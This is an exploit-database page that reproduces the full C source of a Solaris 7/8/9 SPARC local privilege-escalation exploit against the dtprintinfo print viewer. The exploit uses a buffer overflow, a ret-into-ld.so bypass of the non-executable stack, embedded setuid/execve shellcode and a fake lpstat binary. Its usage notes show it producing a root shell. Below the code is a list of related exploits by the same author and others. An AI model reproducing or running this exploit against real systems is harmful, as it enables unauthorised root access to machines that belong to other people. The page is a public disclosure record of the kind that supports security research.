Menu

"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)"

Author

"Marco Ivaldi"

Platform

solaris

Release date

2019-05-20

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
/*
 * raptor_dtprintname_sparc2.c - dtprintinfo 0day, Solaris/SPARC
 * Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * 0day buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to
 * local root. Many thanks to Dave Aitel for discovering this vulnerability
 * and for his interesting research activities on Solaris/SPARC.
 *
 * "None of my dtprintinfo work is public, other than that 0day pack being
 * leaked to all hell and back. It should all basically still work. Let's
 * keep it that way, cool? :>" -- Dave Aitel
 *
 * This is the ret-into-ld.so version of raptor_dtprintname_sparc.c, able 
 * to bypass the non-executable stack protection (noexec_user_stack=1 in 
 * /etc/system).
 *
 * NOTE. If experiencing troubles with null-bytes inside the ld.so.1 memory 
 * space, use sprintf() instead of strcpy() (tested on some Solaris 7 boxes).
 *
 * Usage:
 * $ gcc raptor_dtprintname_sparc2.c -o raptor_dtprintname_sparc2 -ldl -Wall
 * [on your xserver: disable the access control]
 * $ ./raptor_dtprintname_sparc2 192.168.1.1:0
 * [...]
 * # id
 * uid=0(root) gid=10(staff)
 * #
 *
 * Tested on:
 * SunOS 5.7 Generic_106541-21 sun4u sparc SUNW,Ultra-1
 * SunOS 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
 * SunOS 5.9 Generic sun4u sparc SUNW,Ultra-5_10
 * [SunOS 5.10 is also vulnerable, the exploit might require some tweaking]
 */

#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define INFO1	"raptor_dtprintname_sparc2.c - dtprintinfo 0day, Solaris/SPARC"
#define INFO2	"Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define	VULN	"/usr/dt/bin/dtprintinfo"	// the vulnerable program
#define	BUFSIZE	301				// size of the printer name
#define	FFSIZE	64 + 1				// size of the fake frame
#define	DUMMY	0xdeadbeef			// dummy memory address

/* voodoo macros */
#define	VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define	VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}

char sc[] = /* Solaris/SPARC shellcode (12 + 12 + 48 = 72 bytes) */
/* double setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

/* globals */
char	*env[256];
int	env_pos = 0, env_len = 0;

/* prototypes */
int	add_env(char *string);
void	check_zero(int addr, char *pattern);
int	search_ldso(char *sym);
int	search_rwx_mem(void);
void	set_val(char *buf, int pos, int val);

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE], ff[FFSIZE], ret_var[16], fpt_var[16];
	char	platform[256], release[256], display[256];
	int	i, offset, ff_addr, sc_addr, ret_pos, fpt_pos;
	int	plat_len, prog_len, rel;

	char	*arg[2] = {"foo", NULL};
	int	arg_len = 4, arg_pos = 1;

	int	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
	int	ret = search_ldso("strcpy");	/* or sprintf */
	int	rwx_mem = search_rwx_mem();

	/* fake lpstat code */
	if (!strcmp(argv[0], "lpstat")) {

		/* check command line */
		if (argc != 2)
			exit(1);

		/* get ret and fake frame addresses from environment */
		ret = (int)strtoul(getenv("RET"), (char **)NULL, 0);
		ff_addr = (int)strtoul(getenv("FPT"), (char **)NULL, 0);

		/* prepare the evil printer name */
		memset(buf, 'A', sizeof(buf));
		buf[sizeof(buf) - 1] = 0x0;

		/* fill with return and fake frame addresses */
		for (i = 0; i < BUFSIZE; i += 4) {
			/* apparently, we don't need to bruteforce */
			set_val(buf, i, ret - 4);
			set_val(buf, i += 4, ff_addr);
		}

		/* print the expected output and exit */
		if(!strcmp(argv[1], "-v")) {
			fprintf(stderr, "lpstat called with -v\n");
			printf("device for %s: /dev/null\n", buf);
		} else {
			fprintf(stderr, "lpstat called with -d\n");
			printf("system default destination: %s\n", buf);
		}
		exit(0);
	}

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* read command line */
	if (argc != 2) {
		fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
		exit(1);
	}
	sprintf(display, "DISPLAY=%s", argv[1]);

	/* get some system information */
	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
	rel = atoi(release + 2);

	/* prepare the fake frame */
	bzero(ff, sizeof(ff));

	/*
	 * saved %l registers
	 */
	set_val(ff, i  = 0, DUMMY);		/* %l0 */
	set_val(ff, i += 4, DUMMY);		/* %l1 */
	set_val(ff, i += 4, DUMMY);		/* %l2 */
	set_val(ff, i += 4, DUMMY);		/* %l3 */
	set_val(ff, i += 4, DUMMY);		/* %l4 */
	set_val(ff, i += 4, DUMMY);		/* %l5 */
	set_val(ff, i += 4, DUMMY);		/* %l6 */
	set_val(ff, i += 4, DUMMY);		/* %l7 */

	/*
	 * saved %i registers
	 */
	set_val(ff, i += 4, rwx_mem);		/* %i0: 1st arg to strcpy() */
	set_val(ff, i += 4, 0x42424242);	/* %i1: 2nd arg to strcpy() */
	set_val(ff, i += 4, DUMMY);		/* %i2 */
	set_val(ff, i += 4, DUMMY);		/* %i3 */
	set_val(ff, i += 4, DUMMY);		/* %i4 */
	set_val(ff, i += 4, DUMMY);		/* %i5 */
	set_val(ff, i += 4, sb - 1000);		/* %i6: frame pointer */
	set_val(ff, i += 4, rwx_mem - 8);	/* %i7: return address */

	/* fill the envp, keeping padding */
	sc_addr = add_env(ff);
	add_env(sc);
	ret_pos = env_pos;
	add_env("RET=0x41414141");
	fpt_pos = env_pos;
	add_env("FPT=0x42424242");
	add_env(display);
	add_env("PATH=.:/usr/bin");
	add_env("HOME=/tmp");
	add_env(NULL);

	/* calculate the offset to argv[0] (voodoo magic) */
	plat_len = strlen(platform) + 1;
	prog_len = strlen(VULN) + 1;
	offset = arg_len + env_len + plat_len + prog_len;
	if (rel > 7)
		VOODOO64(offset, arg_pos, env_pos)
	else
		VOODOO32(offset, plat_len, prog_len)

	/* calculate the needed addresses */
	ff_addr = sb - offset + arg_len;
	sc_addr += ff_addr;

	/* set fake frame's %i1 */
	set_val(ff, 36, sc_addr);		/* 2nd arg to strcpy() */

	/* overwrite RET and FPT env vars with the right addresses */
	sprintf(ret_var, "RET=0x%x", ret);
	env[ret_pos] = ret_var;
	sprintf(fpt_var, "FPT=0x%x", ff_addr);
	env[fpt_pos] = fpt_var;

	/* create a symlink for the fake lpstat */
	unlink("lpstat");
	symlink(argv[0], "lpstat");

	/* print some output */
	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
	fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
	fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
	fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
	fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);

	/* run the vulnerable program */
	execve(VULN, arg, env);
	perror("execve");
	exit(0);
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char *string)
{
	int	i;

	/* null termination */
	if (!string) {
		env[env_pos] = NULL;
		return(env_len);
	}

	/* add the variable to envp */
	env[env_pos] = string;
	env_len += strlen(string) + 1;
	env_pos++;

	/* pad the envp using zeroes */
	if ((strlen(string) + 1) % 4)
		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
			env[env_pos] = string + strlen(string);
			env_len++;
		}

	return(env_len);
}

/*
 * check_zero(): check an address for the presence of a 0x00
 */
void check_zero(int addr, char *pattern)
{
	if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
	    !(addr & 0xff000000)) {
		fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
		exit(1);
	}
}

/*
 * search_ldso(): search for a symbol inside ld.so.1
 */
int search_ldso(char *sym)
{
	int		addr;
	void		*handle;
	Link_map	*lm;

	/* open the executable object file */
	if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
		perror("dlopen");
		exit(1);
	}

	/* get dynamic load information */
	if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
		perror("dlinfo");
		exit(1);
	}

	/* search for the address of the symbol */
	if ((addr = (int)dlsym(handle, sym)) == NULL) {
		fprintf(stderr, "sorry, function %s() not found\n", sym);
		exit(1);
	}

	/* close the executable object file */
	dlclose(handle);

	check_zero(addr - 4, sym);
	return(addr);
}

/*
 * search_rwx_mem(): search for an RWX memory segment valid for all
 * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
 */
int search_rwx_mem(void)
{
	int	fd;
	char	tmp[16];
	prmap_t	map;
	int	addr = 0, addr_old;

	/* open the proc filesystem */
	sprintf(tmp,"/proc/%d/map", (int)getpid());
	if ((fd = open(tmp, O_RDONLY)) < 0) {
		fprintf(stderr, "can't open %s\n", tmp);
		exit(1);
	}

	/* search for the last RWX memory segment before stack (last - 1) */
	while (read(fd, &map, sizeof(map)))
		if (map.pr_vaddr)
			if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
				addr_old = addr;
				addr = map.pr_vaddr;
			}
	close(fd);

	/* add 4 to the exact address NULL bytes */
	if (!(addr_old & 0xff))
		addr_old |= 0x04;
	if (!(addr_old & 0xff00))
		addr_old |= 0x0400;

	return(addr_old);
}

/*
 * set_val(): copy a dword inside a buffer
 */
void set_val(char *buf, int pos, int val)
{
	buf[pos] =	(val & 0xff000000) >> 24;
	buf[pos + 1] =	(val & 0x00ff0000) >> 16;
	buf[pos + 2] =	(val & 0x0000ff00) >> 8;
	buf[pos + 3] =	(val & 0x000000ff);
}
Release Date Title Type Platform Author
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation" local solaris "Marco Ivaldi"
2019-01-14 "xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)" local solaris "Marco Ivaldi"
2005-05-07 "Sun Solaris AnswerBook2 - Multiple Cross-Site Scripting Vulnerabilities" webapps solaris "Thomas Liam Romanis"
2008-09-17 "Sun Solaris 9/10 Text Editors - Command Execution" remote solaris "Eli the Bearded"
2004-01-26 "Cherokee 0.1.x/0.2.x/0.4.x - Error Page Cross-Site Scripting" remote solaris "César Fernández"
2003-10-22 "Sun Management Center 3.0/3.5 - Error Message Information Disclosure" remote solaris "Jon Hart"
2002-08-02 "Inso DynaWeb HTTPd 3.1/4.0.2/4.1 - Format String" remote solaris ghandi
2002-08-02 "Sun AnswerBook2 1.x - Unauthorized Administrative Script Access" remote solaris ghandi
2002-01-01 "Solaris 2/7/8/9 cachefsd - Remote Heap Overflow" remote solaris "Last Stage of Delirium"
2003-01-09 "Solaris 2.x/7.0/8 - Derived 'login' Remote Buffer Overflow" remote solaris snooq
2001-08-31 "Solaris 2.x/7.0/8 LPD - Remote Command Execution" remote solaris ron1n
2000-04-06 "Netscape PublishingXPert 2.0/2.2/2.5 - Local File Reading" remote solaris "\x00\x00"
2001-04-17 "Solaris 2.6 - FTP Core Dump Shadow Password Recovery" remote solaris warning3
2001-04-11 "Solaris 2.6/7.0 - IN.FTPD CWD 'Username' Enumeration" remote solaris "Johnny Cyberpunk"
2001-03-15 "Solaris 2.6/7.0/8 - snmpXdmid Buffer Overflow (Metasploit)" remote solaris vlad902
2001-03-15 "Solaris 2.6/7.0/8 - snmpXdmid Buffer Overflow" remote solaris "Last Stage of Delirium"
1998-04-01 "Solaris x86 2.4/2.5 - nlps_server Buffer Overflow" remote solaris "Last Stage of Delirium"
2000-08-07 "Solaris AnswerBook2 - Remote Command Execution" remote solaris "Lluis Mora"
2000-08-08 "Sun AnswerBook2 1.4.2/1.4.3/1.4.4 - Administration Interface Access" remote solaris "Lluis Mora"
1999-10-28 "Hughes Technologies Mini SQL (mSQL) 2.0.11 - 'w3-msql' Remote Buffer Overflow" remote solaris Zhodiac
1999-12-10 "Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Remote Buffer Overflow (4)" remote solaris "Cheez Whiz"
2000-11-10 "Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Remote Buffer Overflow (3)" remote solaris "nikolai abromov"
1999-06-24 "Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Remote Buffer Overflow (2)" remote solaris "Cheez Whiz"
1999-06-24 "Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Remote Buffer Overflow (1)" remote solaris "Cheez Whiz"
1999-12-07 "Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - 'print_domain_name' Remote Buffer Overflow" remote solaris K2
1999-06-07 "Sun Solaris 2.5.1 - rpc.statd rpc Call Relaying" remote solaris anonymous
1996-08-03 "Solaris 7.0 - 'Coredump' File Write" remote solaris "Jungseok Roh"
1992-05-27 "SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS" remote solaris anonymous
Release Date Title Type Platform Author
2019-06-17 "Exim 4.87 - 4.91 - Local Privilege Escalation" local linux "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation" local solaris "Marco Ivaldi"
2019-01-14 "xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)" local solaris "Marco Ivaldi"
2018-11-30 "xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation" local openbsd "Marco Ivaldi"
2006-01-18 "MySQL 4.x - CREATE Temporary TABLE Symlink Privilege Escalation" remote multiple "Marco Ivaldi"
2004-08-04 "Oracle 9i - Multiple Vulnerabilities" remote unix "Marco Ivaldi"
2007-02-13 "Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack" remote multiple "Marco Ivaldi"
2007-02-13 "Lotus Domino R6 Webmail - Remote Password Hash Dumper" remote windows "Marco Ivaldi"
2007-02-06 "MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution" remote windows "Marco Ivaldi"
2006-12-19 "Oracle 9i/10g - 'utl_file' FileSystem Access" remote linux "Marco Ivaldi"
2006-12-19 "Oracle 9i/10g - 'extproc' Local/Remote Command Execution" remote multiple "Marco Ivaldi"
2006-11-23 "Oracle 9i/10g - 'read/write/execute' ation Suite" remote multiple "Marco Ivaldi"
2004-12-24 "Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - '/bin/login' Remote Buffer Overflow" remote solaris "Marco Ivaldi"
2018-10-30 "xorg-x11-server 1.20.3 - Privilege Escalation" local openbsd "Marco Ivaldi"
2006-10-24 "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)" local solaris "Marco Ivaldi"
2006-10-13 "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)" local solaris "Marco Ivaldi"
2009-09-11 "IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug" local aix "Marco Ivaldi"
2008-03-10 "Solaris 8/9/10 - 'fifofs I_PEEK' Local Kernel Memory Leak" local solaris "Marco Ivaldi"
2007-04-04 "TrueCrypt 4.3 - 'setuid' Local Privilege Escalation" local windows "Marco Ivaldi"
2006-10-24 "Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)" local solaris "Marco Ivaldi"
2006-10-16 "Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)" local solaris "Marco Ivaldi"
2006-10-13 "Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)" local solaris "Marco Ivaldi"
2006-09-13 "X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (2)" local solaris "Marco Ivaldi"
2006-08-22 "Solaris 8/9 - '/usr/ucb/ps' Local Information Leak" local solaris "Marco Ivaldi"
2006-08-22 "Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)" local solaris "Marco Ivaldi"
2006-07-18 "Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation" local linux "Marco Ivaldi"
2006-07-13 "Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (3)" local linux "Marco Ivaldi"
2006-02-20 "MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)" local linux "Marco Ivaldi"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46879/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46879/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46879/41308/solaris-789-sparc-dtprintinfo-local-privilege-escalation-2/download/", "exploit_id": "46879", "exploit_description": "\"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)\"", "exploit_date": "2019-05-20", "exploit_author": "\"Marco Ivaldi\"", "exploit_type": "local", "exploit_platform": "solaris", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse